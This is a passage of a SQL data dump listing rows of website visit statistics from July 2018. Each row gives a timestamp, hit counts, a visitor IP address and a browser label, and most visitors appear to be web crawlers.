'54.36.148.179','other'),(274916,1531782635,1,1,0,0,'54.36.148.136','other'),(274917,1531782711,1,1,0,0,'54.36.148.18','other'),(274918,1531782899,1,1,0,0,'216.244.66.241','other'),(274919,1531783002,1,1,0,0,'54.36.148.246','other'),(274920,1531783074,1,1,0,0,'54.36.149.58','other'),(274921,1531783218,1,1,0,0,'54.36.148.163','other'),(274922,1531783241,1,1,0,0,'54.36.149.17','other'),(274923,1531783434,1,1,0,0,'54.36.149.91','other'),(274924,1531784009,1,1,0,0,'54.36.148.215','other'),(274925,1531784065,1,1,0,0,'54.36.148.26','other'),(274926,1531784188,1,1,0,0,'54.36.148.71','other'),(274927,1531784240,1,1,0,0,'54.36.149.22','other'),(274928,1531784624,1,1,0,0,'54.36.148.145','other'),(274929,1531785010,1,1,0,0,'216.244.66.241','other'),(274930,1531785672,1,1,0,0,'54.36.148.52','other'),(274931,1531785757,1,1,0,0,'54.36.148.125','other'),(274932,1531785790,1,1,0,0,'54.36.148.167','other'),(274933,1531785836,1,1,0,0,'178.154.171.88','other'),(274934,1531786190,1,1,0,0,'54.36.148.72','other'),(274935,1531786272,1,1,0,0,'54.36.148.100','other'),(274936,1531786474,1,1,0,0,'54.36.148.64','other'),(274937,1531786489,1,1,0,0,'54.36.149.16','other'),(274938,1531786508,1,1,0,0,'54.36.149.100','other'),(274939,1531787188,5,5,0,0,'216.244.66.241','other'),(274940,1531787209,1,1,0,0,'54.36.149.63','other'),(274941,1531787375,1,1,0,0,'54.36.148.243','other'),(274942,1531787473,1,1,0,0,'54.36.148.228','other'),(274943,1531787499,1,1,0,0,'54.36.148.114','other'),(274944,1531787799,1,1,0,0,'54.36.148.136','other'),(274945,1531787894,1,1,0,0,'54.36.148.92','other'),(274946,1531788080,2,2,0,0,'54.36.149.20','other'),(274947,1531788303,1,1,0,0,'54.36.148.250','other'),(274948,1531788577,1,1,0,0,'180.76.15.150','other'),(274949,1531788699,1,1,0,0,'54.36.148.159','other'),(274950,1531788790,1,1,0,0,'54.36.149.67','other'),(274951,1531788801,1,1,0,0,'8.29.198.26','other'),(274952,1531788909,1,1,0,0,'54.36.148.30','other'),(274953,1531788970,1,1,0,0,'54.36.148.174','other'),(274954,1531788971,1,1,0,0,'54.36.148.43','other'),(274955,1531789082,1,1,0,0,'141.8.142.74','other'),(274956,1531789536,1,1,0,0,'54.36.149.90','other'),(274957,1531789917,1,1,0,0,'51.255.65.46','other'),(274958,1531790112,1,1,0,0,'54.36.148.191','other'),(274959,1531790179,1,1,0,0,'54.36.149.100','other'),(274960,1531790182,1,1,0,0,'54.36.148.48','other'),(274961,1531790210,1,1,0,0,'216.244.66.241','other'),(274962,1531790291,1,1,0,0,'54.36.149.87','other'),(274963,1531790683,1,1,0,0,'54.36.148.199','other'),(274964,1531790841,1,1,0,0,'54.36.148.169','other'),(274965,1531791145,1,1,0,0,'54.36.149.97','other'),(274966,1531791155,1,1,0,0,'54.36.148.144','other'),(274967,1531791518,1,1,0,0,'54.36.149.101','other'),(274968,1531791523,1,1,0,0,'54.36.148.82','other'),(274969,1531791763,1,1,0,0,'54.36.148.250','other'),(274970,1531791834,2,2,0,0,'216.244.66.241','other'),(274971,1531791895,1,1,0,0,'54.36.149.47','other'),(274972,1531792184,1,1,0,0,'54.36.149.39','other'),(274973,1531792411,1,1,0,0,'8.29.198.26','other'),(274974,1531792505,1,1,0,0,'54.36.149.17','other'),(274975,1531792571,1,1,0,0,'54.36.148.164','other'),(274976,1531793097,1,1,0,0,'54.36.148.91','other'),(274977,1531793261,1,1,0,0,'173.252.88.2','other'),(274978,1531793361,1,1,0,0,'54.36.149.15','other'),(274979,1531793480,1,1,0,0,'54.36.148.178','other'),(274980,1531793545,1,1,0,0,'141.8.142.74','other'),(274981,1531793766,1,1,0,0,'54.36.148.132','other'),(274982,1531793945,1,1,0,0,'54.36.149.64','other'),(274983,1531794214,1,1,0,0,'54.165.59.7','other'),(274984,1531794280,1,1,0,0,'54.36.148.156','other'),(274985,1531794464,1,1,0,0,'54.36.148.247','other'),(274986,1531794498,1,1,0,0,'54.36.149.61','other'),(274987,1531794522,1,1,0,0,'54.36.148.223','other'),(274988,1531794685,1,1,0,0,'54.36.148.83','other'),(274989,1531795023,1,1,0,0,'54.36.148.113','other'),(274990,1531795178,1,1,0,0,'54.165.59.7','other'),(274991,1531795438,1,1,0,0,'54.36.149.79','other'),(274992,1531795776,2,2,0,0,'95.213.141.126','opera'),(274993,1531795779,1,1,0,0,'157.55.39.126','other'),(274994,1531795921,1,1,0,0,'54.36.149.92','other'),(274995,1531796069,1,1,0,0,'54.36.148.213','other'),(274996,1531796309,2,2,0,0,'207.46.13.15','other'),(274997,1531796430,1,1,0,0,'54.36.148.11','other'),(274998,1531796432,1,1,0,0,'54.36.148.18','other'),(274999,1531796843,1,1,0,0,'54.36.148.137','other'),(275000,1531797068,1,1,0,0,'54.36.149.36','other'),(275001,1531797409,1,1,0,0,'54.36.148.40','other'),(275002,1531797492,1,1,0,0,'54.36.149.55','other'),(275003,1531797544,1,1,0,0,'69.171.240.80','other'),(275004,1531797720,1,1,0,0,'157.55.39.126','other'),(275005,1531797820,1,1,0,0,'54.36.148.15','other'),(275006,1531797873,1,1,0,0,'54.36.148.109','other'),(275007,1531797895,1,0,1,0,'66.249.69.169',''),(275008,1531797944,1,0,1,0,'66.249.69.89',''),(275009,1531797965,1,0,1,0,'66.249.69.163',''),(275010,1531798043,4,4,0,0,'216.244.66.241','other'),(275011,1531798217,1,1,0,0,'66.249.69.93','chrome'),(275012,1531798220,1,1,0,0,'54.36.149.35','other'),(275013,1531798243,1,1,0,0,'54.36.148.71','other'),(275014,1531798403,1,1,0,0,'54.36.148.232','other'),(275015,1531798677,1,1,0,0,'54.36.148.235','other'),(275016,1531798791,2,2,0,0,'54.165.59.7','other'),(275017,1531798999,1,1,0,0,'54.36.149.29','other'),(275018,1531799011,1,1,0,0,'54.36.149.39','other'),(275019,1531799195,1,1,0,0,'54.36.149.53','other'),(275020,1531799303,1,1,0,0,'54.36.148.228','other'),(275021,1531799359,1,1,0,0,'54.36.148.62','other'),(275022,1531799432,1,1,0,0,'54.36.148.194','other'),(275023,1531799497,1,1,0,0,'54.36.148.113','other'),(275024,1531799633,1,1,0,0,'8.29.198.25','other'),(275025,1531799724,1,1,0,0,'54.36.148.188','other'),(275026,1531800191,1,1,0,0,'66.249.69.93','chrome'),(275027,1531800241,1,1,0,0,'54.36.149.30','other'),(275028,1531800349,1,1,0,0,'54.165.59.7','other'),(275029,1531800688,1,1,0,0,'51.255.65.46','other'),(275030,1531800775,1,1,0,0,'54.36.149.84','other'),(275031,1531800780,1,1,0,0,'54.36.149.54','other'),(275032,1531801001,1,1,0,0,'54.36.148.223','other'),(275033,1531801173,1,1,0,0,'141.8.142.74','other'),(275034,1531801307,1,1,0,0,'54.36.149.77','other'),(275035,1531801338,1,1,0,0,'54.36.149.56','other'),(275036,1531801637,1,1,0,0,'54.36.148.64','other'),(275037,1531802191,1,1,0,0,'54.36.149.37','other'),(275038,1531802269,1,1,0,0,'216.244.66.241','other'),(275039,1531802283,1,0,1,0,'66.249.69.91',''),(275040,1531802506,1,1,0,0,'54.36.148.11','other'),(275041,1531802669,1,1,0,0,'54.36.148.94','other'),(275042,1531802734,1,1,0,0,'54.36.149.93','other'),(275043,1531802861,1,1,0,0,'54.36.148.59','other'),(275044,1531802879,1,1,0,0,'54.36.148.137','other'),(275045,1531802960,1,1,0,0,'54.165.59.7','other'),(275046,1531803204,1,1,0,0,'54.36.149.48','other'),(275047,1531803253,1,1,0,0,'8.29.198.25','other'),(275048,1531803278,1,1,0,0,'54.36.149.98','other'),(275049,1531803467,1,1,0,0,'141.8.142.74','other'),(275050,1531803513,1,1,0,0,'54.36.148.224','other'),(275051,1531803741,1,0,1,0,'66.249.69.163',''),(275052,1531803742,1,1,0,0,'54.36.148.42','other'),(275053,1531804076,1,1,0,0,'54.36.148.13','other'),(275054,1531804342,1,1,0,0,'207.46.13.90','other'),(275055,1531804859,1,1,0,0,'54.36.149.44','other'),(275056,1531805379,2,2,0,0,'91.196.178.78','chrome'),(275057,1531805408,1,1,0,0,'54.36.148.63','other'),(275058,1531805550,1,1,0,0,'95.24.201.60','msie'),(275059,1531805553,1,1,0,0,'128.75.127.188','msie'),(275060,1531805651,1,1,0,0,'54.36.148.127','other'),(275061,1531805711,1,1,0,0,'54.36.149.38','other'),(275062,1531805770,1,1,0,0,'52.41.211.72','chrome'),(275063,1531805844,1,1,0,0,'54.36.149.105','other'),(275064,1531805882,1,1,0,0,'54.36.148.53','other'),(275065,1531805898,2,2,0,0,'216.244.66.241','other'),(275066,1531805979,1,1,0,0,'54.36.148.253','other'),(275067,1531806015,1,1,0,0,'54.36.148.12','other'),(275068,1531806027,1,1,0,0,'54.36.148.142','other'),(275069,1531806128,1,1,0,0,'54.36.149.37','other'),(275070,1531806360,1,1,0,0,'54.36.148.205','other'),(275071,1531806608,1,1,0,0,'54.36.148.122','other'),(275072,1531806692,1,1,0,0,'46.201.93.171','chrome'),(275073,1531807000,2,0,2,0,'66.249.69.163',''),(275074,1531807033,1,1,0,0,'54.36.148.103','other'),(275075,1531807034,2,2,0,0,'162.210.196.97','other'),(275076,1531807173,1,1,0,0,'54.36.148.204','other'),(275077,1531807177,1,1,0,0,'54.36.149.72','other'),(275078,1531807280,1,1,0,0,'54.36.149.17','other'),(275079,1531807412,1,1,0,0,'107.21.1.8','other'),(275080,1531807415,1,1,0,0,'54.208.102.37','other'),(275081,1531807425,1,1,0,0,'54.36.148.33','other'),(275082,1531807447,1,1,0,0,'54.36.148.54','other'),(275083,1531807510,1,1,0,0,'37.55.158.118','chrome'),(275084,1531807544,1,1,0,0,'54.36.148.58','other'),(275085,1531807946,1,1,0,0,'54.36.148.175','other'),(275086,1531807970,1,1,0,0,'54.36.148.185','other'),(275087,1531808016,1,1,0,0,'54.36.148.159','other'),(275088,1531808084,1,1,0,0,'54.36.148.23','other'),(275089,1531808178,1,1,0,0,'216.244.66.241','other'),(275090,1531808609,1,1,0,0,'54.36.148.40','other'),(275091,1531808759,1,1,0,0,'54.36.148.82','other'),(275092,1531808835,1,1,0,0,'80.93.123.53','firefox'),(275093,1531809044,1,1,0,0,'54.36.148.152','other'),(275094,1531809290,1,1,0,0,'54.36.149.32','other'),(275095,1531809314,2,2,0,0,'91.196.178.78','chrome'),(275096,1531809575,1,1,0,0,'216.244.66.241','other'),(275097,1531809596,1,1,0,0,'54.36.148.175','other'),(275098,1531809725,1,1,0,0,'130.180.216.229','chrome'),(275099,1531809803,2,2,0,0,'91.196.178.47','chrome'),(275100,1531810224,1,1,0,0,'54.36.149.41','other'),(275101,1531810467,1,1,0,0,'8.29.198.25','other'),(275102,1531810593,1,1,0,0,'91.124.187.240','chrome'),(275103,1531810764,1,1,0,0,'54.36.149.91','other'),(275104,1531810821,1,1,0,0,'54.36.148.124','other'),(275105,1531810824,1,1,0,0,'54.36.149.103','other'),(275106,1531810903,2,2,0,0,'91.196.178.169','chrome'),(275107,1531810974,1,1,0,0,'54.36.148.30','other'),(275108,1531810986,1,1,0,0,'54.36.148.130','other'),(275109,1531811509,1,1,0,0,'54.36.148.165','other'),(275110,1531811575,2,2,0,0,'91.196.178.78','chrome'),(275111,1531811623,1,1,0,0,'54.36.149.82','other'),(275112,1531811672,1,1,0,0,'46.211.155.44','chrome'),(275113,1531811935,1,1,0,0,'180.76.15.142','other'),(275114,1531812095,1,1,0,0,'54.36.148.204','other'),(275115,1531812145,1,1,0,0,'54.36.148.218','other'),(275116,1531812688,1,1,0,0,'54.36.148.113','other'),(275117,1531812751,1,1,0,0,'54.36.148.240','other'),(275118,1531813036,1,1,0,0,'54.36.148.20','other'),(275119,1531813499,1,1,0,0,'54.36.149.40','other'),(275120,1531813657,1,1,0,0,'91.124.182.170','firefox'),(275121,1531813688,1,1,0,0,'54.36.149.73','other'),(275122,1531813891,2,2,0,0,'216.244.66.241','other'),(275123,1531813968,1,1,0,0,'54.36.148.30','other'),(275124,1531813989,1,1,0,0,'178.95.36.183','chrome'),(275125,1531814088,1,1,0,0,'8.29.198.27','other'),(275126,1531814175,1,1,0,0,'54.36.148.28','other'),(275127,1531814414,1,1,0,0,'54.36.148.106','other'),(275128,1531814447,1,1,0,0,'54.36.149.49','other'),(275129,1531814490,1,1,0,0,'54.36.148.183','other'),(275130,1531814673,1,1,0,0,'54.36.148.130','other'),(275131,1531814824,1,1,0,0,'54.36.148.232','other'),(275132,1531814920,1,1,0,0,'54.36.148.67','other'),(275133,1531814999,1,1,0,0,'54.36.148.12','other'),(275134,1531815019,1,1,0,0,'54.36.148.26','other'),(275135,1531815038,1,1,0,0,'5.248.129.241','chrome'),(275136,1531815165,1,1,0,0,'54.36.149.83','other'),(275137,1531815266,2,2,0,0,'130.180.218.147','chrome'),(275138,1531815454,1,1,0,0,'195.225.147.207','chrome'),(275139,1531815499,1,1,0,0,'54.36.148.239','other'),(275140,1531815592,4,4,0,0,'216.244.66.241','other'),(275141,1531815686,1,1,0,0,'54.36.148.110','other'),(275142,1531815763,1,1,0,0,'54.36.148.157','other'),(275143,1531815788,1,1,0,0,'54.36.148.170','other'),(275144,1531815804,1,1,0,0,'54.36.148.118','other'),(275145,1531815910,1,1,0,0,'54.36.149.105','other'),(275146,1531816301,1,1,0,0,'54.36.148.73','other'),(275147,1531816303,1,1,0,0,'54.36.148.144','other'),(275148,1531816387,1,1,0,0,'54.36.148.42','other'),(275149,1531816460,1,1,0,0,'192.162.242.169','chrome'),(275150,1531816562,1,1,0,0,'54.36.148.138','other'),(275151,1531816683,1,1,0,0,'54.36.149.25','other'),(275152,1531816967,1,1,0,0,'54.36.149.92','other'),(275153,1531817157,1,1,0,0,'95.132.6.0','firefox'),(275154,1531817336,1,1,0,0,'54.36.148.32','other'),(275155,1531817730,1,1,0,0,'54.36.148.116','other'),(275156,1531817816,1,1,0,0,'178.95.215.105','chrome'),(275157,1531817946,1,1,0,0,'54.36.148.239','other'),(275158,1531818182,1,1,0,0,'54.36.148.156','other'),(275159,1531818239,1,1,0,0,'54.36.148.171','other'),(275160,1531818298,1,1,0,0,'54.36.149.7','other'),(275161,1531818369,1,1,0,0,'51.255.65.46','other'),(275162,1531818432,1,1,0,0,'54.36.148.187','other'),(275163,1531818587,1,1,0,0,'54.36.149.20','other'),(275164,1531818772,1,1,0,0,'54.36.148.123','other'),(275165,1531818797,1,1,0,0,'54.36.148.205','other'),(275166,1531818920,2,2,0,0,'141.8.142.74','other'),(275167,1531818945,1,1,0,0,'54.36.148.70','other'),(275168,1531818982,1,1,0,0,'216.244.66.241','other'),(275169,1531819270,1,1,0,0,'54.36.148.43','other'),(275170,1531819646,1,1,0,0,'176.9.25.107','other'),(275171,1531819706,1,1,0,0,'54.36.148.64','other'),(275172,1531819726,1,1,0,0,'54.36.149.93','other'),(275173,1531819858,1,1,0,0,'141.8.142.74','other'),(275174,1531819917,1,1,0,0,'54.36.148.191','other'),(275175,1531820061,1,1,0,0,'54.36.149.1','other'),(275176,1531820352,1,1,0,0,'54.36.149.80','other'),(275177,1531820516,1,1,0,0,'54.36.148.153','other'),(275178,1531820795,1,1,0,0,'54.36.148.235','other'),(275179,1531820818,1,1,0,0,'216.244.66.241','other'),(275180,1531821039,1,1,0,0,'54.36.148.205','other'),(275181,1531821310,1,1,0,0,'8.29.198.26','other'),(275182,1531821494,1,1,0,0,'207.46.13.44','other'),(275183,1531821712,1,1,0,0,'54.36.149.53','other'),(275184,1531821788,2,2,0,0,'91.196.177.46','chrome'),(275185,1531821927,1,1,0,0,'54.36.149.31','other'),(275186,1531821996,1,1,0,0,'54.36.148.193','other'),(275187,1531822362,2,2,0,0,'91.196.178.169','chrome'),(275188,1531822725,1,1,0,0,'54.36.149.102','other'),(275189,1531822728,1,1,0,0,'54.36.148.199','other'),(275190,1531822904,1,1,0,0,'54.36.148.34','other'),(275191,1531822967,1,1,0,0,'54.36.149.21','other'),(275192,1531823032,1,1,0,0,'157.55.39.154','other'),(275193,1531823197,1,1,0,0,'54.36.148.27','other'),(275194,1531823213,1,1,0,0,'54.36.148.235','other'),(275195,1531823275,1,1,0,0,'54.36.148.101','other'),(275196,1531823386,1,1,0,0,'54.36.148.130','other'),(275197,1531823405,1,0,1,0,'66.249.69.169',''),(275198,1531823436,1,1,0,0,'54.36.148.181','other'),(275199,1531823878,1,1,0,0,'54.36.148.151','other'),(275200,1531824004,1,1,0,0,'54.36.148.42','other'),(275201,1531824067,1,1,0,0,'178.154.171.88','other'),(275202,1531824113,1,1,0,0,'54.36.148.167','other'),(275203,1531824246,1,1,0,0,'54.36.148.236','other'),(275204,1531824283,1,1,0,0,'54.36.148.183','other'),(275205,1531824296,1,1,0,0,'54.36.149.55','other'),(275206,1531824674,1,1,0,0,'66.249.69.91','chrome'),(275207,1531824925,1,1,0,0,'8.29.198.26','other'),(275208,1531825023,1,1,0,0,'54.36.148.159','other'),(275209,1531825059,1,1,0,0,'54.36.148.60','other'),(275210,1531825197,1,1,0,0,'54.36.148.248','other'),(275211,1531825241,2,2,0,0,'216.244.66.241','other'),(275212,1531825313,1,1,0,0,'54.36.148.128','other'),(275213,1531825321,1,1,0,0,'212.90.167.162','firefox'),(275214,1531825737,1,1,0,0,'54.36.148.35','other'),(275215,1531825776,1,1,0,0,'180.163.220.42','chrome'),(275216,1531825829,1,1,0,0,'54.36.148.135','other'),(275217,1531825918,1,1,0,0,'54.36.148.46','other'),(275218,1531826270,1,1,0,0,'54.36.149.77','other'),(275219,1531826294,2,2,0,0,'91.196.178.169','chrome'),(275220,1531826717,1,1,0,0,'54.36.148.227','other'),(275221,1531826755,2,2,0,0,'130.180.220.97','chrome'),(275222,1531826831,1,1,0,0,'91.196.178.185','chrome'),(275223,1531827302,1,1,0,0,'216.244.66.241','other'),(275224,1531827351,2,2,0,0,'91.196.178.131','chrome'),(275225,1531827395,1,1,0,0,'91.196.178.86','firefox'),(275226,1531827984,1,1,0,0,'54.36.148.157','other'),(275227,1531827998,1,1,0,0,'163.172.171.163','chrome'),(275228,1531828160,1,1,0,0,'54.36.148.148','other'),(275229,1531828549,1,1,0,0,'141.8.142.74','other'),(275230,1531828559,1,1,0,0,'54.36.149.74','other'),(275231,1531828562,1,1,0,0,'66.102.9.40','chrome'),(275232,1531828755,1,1,0,0,'54.36.148.192','other'),(275233,1531829089,1,1,0,0,'54.36.148.57','other'),(275234,1531829212,1,1,0,0,'54.36.148.166','other'),(275235,1531829234,1,1,0,0,'54.36.148.50','other'),(275236,1531829255,1,1,0,0,'54.36.149.19','other'),(275237,1531829653,1,1,0,0,'141.8.142.74','other'),(275238,1531829855,1,1,0,0,'54.36.148.93','other'),(275239,1531830031,1,1,0,0,'54.36.148.47','other'),(275240,1531830151,1,1,0,0,'54.36.149.62','other'),(275241,1531830175,1,1,0,0,'54.36.148.156','other'),(275242,1531830313,1,1,0,0,'157.55.39.154','other'),(275243,1531830330,1,1,0,0,'54.36.148.236','other'),(275244,1531830409,1,1,0,0,'216.244.66.241','other'),(275245,1531830538,1,1,0,0,'54.36.148.135','other'),(275246,1531830605,1,1,0,0,'54.36.148.33','other'),(275247,1531830768,1,1,0,0,'54.36.148.210','other'),(275248,1531830810,1,1,0,0,'54.36.149.26','other'),(275249,1531831106,1,1,0,0,'91.196.179.138','chrome'),(275250,1531831161,1,1,0,0,'54.36.149.88','other'),(275251,1531831314,1,1,0,0,'54.36.149.104','other'),(275252,1531831509,1,1,0,0,'54.36.149.47','other'),(275253,1531831545,1,1,0,0,'54.36.148.145','other'),(275254,1531831620,1,1,0,0,'54.36.148.125','other'),(275255,1531831727,1,1,0,0,'54.36.148.123','other'),(275256,1531831776,1,1,0,0,'216.244.66.241','other'),(275257,1531831839,1,1,0,0,'178.95.66.69','chrome'),(275258,1531831891,1,1,0,0,'54.36.148.17','other'),(275259,1531832075,1,1,0,0,'54.36.149.42','other'),(275260,1531832110,1,1,0,0,'54.36.148.94','other'),(275261,1531832144,1,1,0,0,'8.29.198.26','other'),(275262,1531832195,1,1,0,0,'54.36.148.91','other'),(275263,1531832218,1,1,0,0,'46.200.161.54','chrome'),(275264,1531832399,1,1,0,0,'46.201.93.171','chrome'),(275265,1531832541,1,1,0,0,'178.154.171.88','other'),(275266,1531832854,1,1,0,0,'54.36.148.253','other'),(275267,1531832872,1,1,0,0,'54.36.148.158','other'),(275268,1531832917,1,1,0,0,'54.36.148.75','other'),(275269,1531833136,3,3,0,0,'216.244.66.241','other'),(275270,1531833577,1,1,0,0,'54.36.148.59','other'),(275271,1531833603,1,1,0,0,'54.36.148.140','other'),(275272,1531833709,1,1,0,0,'54.36.148.190','other'),(275273,1531833743,2,2,0,0,'91.196.178.131','chrome'),(275274,1531834030,1,1,0,0,'95.132.6.0','chrome'),(275275,1531834038,1,1,0,0,'54.36.148.33','other'),(275276,1531834130,1,1,0,0,'91.124.182.170','firefox'),(275277,1531834325,1,1,0,0,'216.244.66.241','other'),(275278,1531834648,1,1,0,0,'141.8.142.74','other'),(275279,1531834781,1,1,0,0,'54.36.148.223','other'),(275280,1531834802,1,1,0,0,'54.36.148.67','other'),(275281,1531835166,1,1,0,0,'54.36.148.15','other'),(275282,1531835216,1,1,0,0,'54.36.149.76','other'),(275283,1531835472,1,1,0,0,'95.163.255.115','other'),(275284,1531835510,1,1,0,0,'54.36.148.16','other'),(275285,1531835564,2,2,0,0,'216.244.66.241','other'),(275286,1531835760,1,1,0,0,'8.29.198.26','other'),(275287,1531835881,1,1,0,0,'54.36.148.243','other'),(275288,1531836129,1,1,0,0,'141.8.142.74','other'),(275289,1531836179,1,1,0,0,'37.9.113.110','other'),(275290,1531836231,1,1,0,0,'95.215.223.233','chrome'),(275291,1531836378,1,1,0,0,'54.36.148.12','other'),(275292,1531836448,1,1,0,0,'54.36.148.105','other'),(275293,1531836481,1,1,0,0,'54.36.148.91','other'),(275294,1531836696,1,1,0,0,'54.36.149.20','other'),(275295,1531836729,1,1,0,0,'54.36.148.35','other'),(275296,1531836792,1,1,0,0,'54.36.148.39','other'),(275297,1531836874,1,1,0,0,'54.36.149.22','other'),(275298,1531836875,1,1,0,0,'54.36.149.34','other'),(275299,1531837376,1,1,0,0,'54.36.149.77','other'),(275300,1531837700,1,1,0,0,'54.36.148.226','other'),(275301,1531837749,1,1,0,0,'54.36.148.100','other'),(275302,1531837994,1,1,0,0,'54.36.148.15','other'),(275303,1531838112,1,0,1,0,'66.249.69.89',''),(275304,1531838357,1,1,0,0,'54.36.149.38','other'),(275305,1531838439,1,1,0,0,'54.36.148.104','other'),(275306,1531838603,1,1,0,0,'54.36.148.78','other'),(275307,1531838733,1,1,0,0,'188.230.43.254','other'),(275308,1531838899,1,1,0,0,'54.36.148.160','other'),(275309,1531838994,1,1,0,0,'54.36.148.120','other'),(275310,1531839498,2,2,0,0,'91.196.178.181','chrome'),(275311,1531839715,1,1,0,0,'54.36.149.16','other'),(275312,1531839943,1,1,0,0,'188.230.43.254','other'),(275313,1531839989,1,1,0,0,'54.36.149.45','other'),(275314,1531840165,1,1,0,0,'54.36.148.187','other'),(275315,1531840571,1,1,0,0,'141.8.142.74','other'),(275316,1531840581,1,1,0,0,'54.36.148.40','other'),(275317,1531840692,1,1,0,0,'54.36.149.77','other'),(275318,1531840714,1,1,0,0,'54.36.148.251','other'),(275319,1531840813,2,2,0,0,'216.244.66.241','other'),(275320,1531840859,1,1,0,0,'54.36.149.58','other'),(275321,1531840897,3,3,0,0,'178.63.34.189','other'),(275322,1531841018,1,1,0,0,'54.36.148.98','other'),(275323,1531841111,1,1,0,0,'54.36.148.142','other'),(275324,1531841169,1,1,0,0,'54.36.148.10','other'),(275325,1531841303,1,1,0,0,'54.36.149.101','other'),(275326,1531841660,1,1,0,0,'54.36.149.99','other'),(275327,1531841750,1,1,0,0,'54.36.148.79','other'),(275328,1531841859,1,1,0,0,'54.36.148.253','other'),(275329,1531842073,1,1,0,0,'216.244.66.241','other'),(275330,1531842302,1,1,0,0,'188.230.43.254','other'),(275331,1531842989,1,1,0,0,'8.29.198.26','other'),(275332,1531843043,3,3,0,0,'216.244.66.241','other'),(275333,1531843222,1,1,0,0,'54.36.148.93','other'),(275334,1531843449,1,1,0,0,'54.36.148.30','other'),(275335,1531843618,1,1,0,0,'54.36.148.142','other'),(275336,1531843797,1,1,0,0,'54.36.148.43','other'),(275337,1531844008,2,2,0,0,'141.8.142.74','other'),(275338,1531844126,1,1,0,0,'54.36.148.26','other'),(275339,1531844492,1,1,0,0,'54.36.149.8','other'),(275340,1531844593,1,1,0,0,'91.196.178.131','firefox'),(275341,1531844601,2,2,0,0,'216.244.66.241','other'),(275342,1531844627,1,1,0,0,'54.36.149.12','other'),(275343,1531844672,1,1,0,0,'54.36.148.164','other'),(275344,1531844691,1,1,0,0,'188.230.43.254','other'),(275345,1531844993,1,1,0,0,'87.250.224.46','other'),(275346,1531845338,4,4,0,0,'144.76.38.40','other'),(275347,1531845358,1,1,0,0,'54.36.148.10','other'),(275348,1531845443,1,1,0,0,'54.36.149.71','other'),(275349,1531845606,1,1,0,0,'54.36.148.114','other'),(275350,1531845703,1,1,0,0,'54.36.148.22','other'),(275351,1531845836,2,2,0,0,'216.244.66.241','other'),(275352,1531846102,1,1,0,0,'54.36.149.16','other'),(275353,1531846280,1,1,0,0,'176.193.115.115','msie'),(275354,1531846300,1,0,1,0,'66.249.69.93',''),(275355,1531846513,1,1,0,0,'54.36.148.117','other'),(275356,1531846589,1,1,0,0,'8.29.198.27','other'),(275357,1531846719,1,1,0,0,'54.36.149.9','other'),(275358,1531846781,1,1,0,0,'54.36.148.191','other'),(275359,1531847047,1,0,1,0,'66.249.69.89',''),(275360,1531847088,1,1,0,0,'188.230.43.254','other'),(275361,1531847224,1,1,0,0,'216.244.66.241','other'),(275362,1531847280,1,1,0,0,'54.36.149.73','other'),(275363,1531847439,1,1,0,0,'54.36.148.239','other'),(275364,1531847787,2,2,0,0,'94.178.155.165','chrome'),(275365,1531847887,1,0,1,0,'66.249.75.155',''),(275366,1531848279,3,3,0,0,'92.113.189.235','chrome'),(275367,1531848299,1,1,0,0,'54.36.149.94','other'),(275368,1531848311,1,1,0,0,'54.36.148.187','other'),(275369,1531848615,2,2,0,0,'54.36.148.222','other'),(275370,1531848634,1,1,0,0,'54.36.148.101','other'),(275371,1531848743,2,2,0,0,'216.244.66.241','other'),(275372,1531848798,3,3,0,0,'91.196.178.84','chrome'),(275373,1531848847,2,2,0,0,'54.36.148.190','other'),(275374,1531848917,1,1,0,0,'54.36.149.1','other'),(275375,1531849124,1,1,0,0,'54.36.148.227','other'),(275376,1531849254,1,1,0,0,'91.196.178.93','firefox'),(275377,1531849561,1,1,0,0,'54.36.148.161','other'),(275378,1531849606,1,1,0,0,'54.36.149.24','other'),(275379,1531849716,1,1,0,0,'54.36.148.136','other'),(275380,1531849868,1,1,0,0,'216.244.66.241','other'),(275381,1531849999,2,2,0,0,'141.8.142.74','other'),(275382,1531850223,1,1,0,0,'54.36.148.166','other'),(275383,1531850372,1,1,0,0,'54.36.148.142','other'),(275384,1531850387,1,1,0,0,'54.36.148.41','other'),(275385,1531850456,1,1,0,0,'54.36.148.229','other'),(275386,1531850482,1,1,0,0,'54.36.149.99','other'),(275387,1531850490,1,0,1,0,'66.249.69.144',''),(275388,1531850544,1,1,0,0,'54.36.149.26','other'),(275389,1531850604,1,1,0,0,'54.36.149.11','other'),(275390,1531850688,1,0,1,0,'66.249.69.143',''),(275391,1531850714,1,1,0,0,'54.36.149.85','other'),(275392,1531850793,1,1,0,0,'54.36.148.251','other'),(275393,1531850830,1,1,0,0,'54.36.148.136','other'),(275394,1531850904,1,1,0,0,'54.36.148.100','other'),(275395,1531850926,1,1,0,0,'54.36.149.9','other'),(275396,1531850952,1,1,0,0,'54.36.149.60','other'),(275397,1531850970,1,1,0,0,'54.36.148.19','other'),(275398,1531851024,1,1,0,0,'54.36.148.99','other'),(275399,1531851050,1,1,0,0,'46.200.187.95','chrome'),(275400,1531851484,1,1,0,0,'77.109.30.48','chrome'),(275401,1531851552,1,1,0,0,'54.36.148.226','other'),(275402,1531851730,1,1,0,0,'54.36.148.88','other'),(275403,1531851929,1,1,0,0,'54.36.149.49','other'),(275404,1531852131,1,1,0,0,'54.36.148.245','other'),(275405,1531852268,1,1,0,0,'54.36.148.26','other'),(275406,1531852272,1,1,0,0,'54.36.149.53','other'),(275407,1531852372,1,1,0,0,'54.36.148.177','other'),(275408,1531852398,1,1,0,0,'54.36.148.141','other'),(275409,1531852429,1,1,0,0,'88.198.69.233','other'),(275410,1531852489,5,5,0,0,'94.179.247.52','chrome'),(275411,1531852636,1,1,0,0,'54.36.149.11','other'),(275412,1531852680,1,1,0,0,'54.36.148.253','other'),(275413,1531852768,1,1,0,0,'54.36.148.235','other'),(275414,1531853090,1,1,0,0,'54.36.148.144','other'),(275415,1531853164,1,1,0,0,'54.36.148.248','other'),(275416,1531853185,1,1,0,0,'54.36.148.18','other'),(275417,1531853187,1,1,0,0,'54.36.148.75','other'),(275418,1531853595,1,1,0,0,'54.36.148.172','other'),(275419,1531853634,1,1,0,0,'54.36.149.46','other'),(275420,1531853746,1,1,0,0,'54.36.148.229','other'),(275421,1531853823,1,1,0,0,'8.29.198.26','other'),(275422,1531853945,1,1,0,0,'54.36.148.196','other'),(275423,1531854302,1,1,0,0,'54.36.149.34','other'),(275424,1531854612,1,1,0,0,'78.111.186.240','firefox'),(275425,1531854760,1,1,0,0,'54.36.148.23','other'),(275426,1531854843,2,2,0,0,'216.244.66.241','other'),(275427,1531854903,2,2,0,0,'195.60.230.8','chrome'),(275428,1531854909,1,1,0,0,'54.36.148.181','other'),(275429,1531854989,1,1,0